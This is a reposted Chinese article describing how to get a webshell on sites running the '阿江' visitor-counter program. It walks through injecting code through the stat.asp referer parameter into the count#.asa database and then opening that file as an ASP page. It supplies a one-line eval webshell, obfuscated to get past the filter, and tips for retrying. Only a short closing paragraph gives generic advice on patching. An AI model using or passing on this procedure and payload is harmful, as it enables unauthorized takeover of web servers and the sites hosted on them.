（转载）也可以利用网站访问计数系统记录来获得webshell

mojitingliu

最明显的就是某私服程序内的阿江计数程序，可以通过http://网站/stat.asp?sty——l——e=text&referer= 代码内容&s——Cr——eenwi——dth=1024直接提交，即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为cou——nt#.asa，我们可以通过http://网站/count%23.asa访问得到webshell，由于阿江计数程序过滤了%和+，将最小马改成<SC——RIPT RU——AT=SERV——ER LAN——GUAGE=vbSCR——IPT>ev——al(Req——uest(“1″))</SC——RIPT>替换代码内容处提交，然后用lake2的e——val客户端来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。

解决方案

由于本文涉及的代码版本很多，所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告，若自己发现相关漏洞也可及时通知官方网站。